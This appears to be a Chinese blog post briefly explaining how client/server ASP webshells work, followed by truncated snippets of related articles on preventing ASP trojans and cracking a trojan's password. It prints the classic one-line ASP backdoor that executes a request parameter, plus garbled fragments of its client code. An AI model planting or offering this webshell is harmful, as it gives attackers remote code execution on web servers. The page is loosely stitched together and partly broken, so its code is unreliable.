這幾天狂補asp,昨天休息,無聊就把自己的東西總結了一下,突然想到了我們經常使用的c/s型的webshell,
於是乎就胡亂分析了一下!呵呵!
眾所周知,藍屏的最小的asp木馬,服務端僅一句話:
<%execute request("neeao")%>
可以說是c/s型木馬的極品!再看客戶端:
"" then session("b")=request("kker")
if session("b")<>"" then execute session("b")%>
其中客戶端提交的一段**為:
......
" οnsubmit="return(ccc());">
rows="20" cols="100">
on error resume next
session.timeout=1440
......
可見其就是用的這種方法!
總的來說,c/s型的webshell使用的方法就是通過客戶端提交資訊,利用asp的request方法來獲取客戶端的資料然後執行,
呵呵,怎麼覺的象是廢話呢!
宣告:本文沒什麼技術含量,僅算是自己學習的乙個總結吧!
ASP木馬的防範 zz
asp木馬 webshell之安全防範解決辦法 1 首先我們來看看一般asp木馬 webshell所利用的asp元件有那些?我們以海洋森馬為列 objectrunat server id ws scope page classid clsid 72c24dd5 d70a 438b 8a42 9842...
破解一ASP木馬密碼的方法
今天在論壇看到要這個密碼的,雖然可以修改為自己的密碼啦 我修改後的就可以 不會破解 沒學過asp,vb google啦下,就找到個辦法,由於這個文章網上的幾個都一樣找不到源出處就沒註明啦。修改的部分我已經做啦加紅標記 破解目標 破解一asp木馬的經過加密的登破解asp木馬密碼陸密碼。由於木馬裡沒有版...
基本預防asp中木馬的方法
1 我們建議客戶通過ftp來上傳 維護網頁,盡量不安裝asp的上傳程式。2 對asp上傳程式的呼叫一定要進行身份認證,並只允許信任的人使用上傳程式。這其中包括各種新聞發布 及論壇程式,只要可以上傳檔案的asp都要進行身份認證 另可以在不需要上傳功能時將實現上傳的asp檔案改名或刪除,如upload....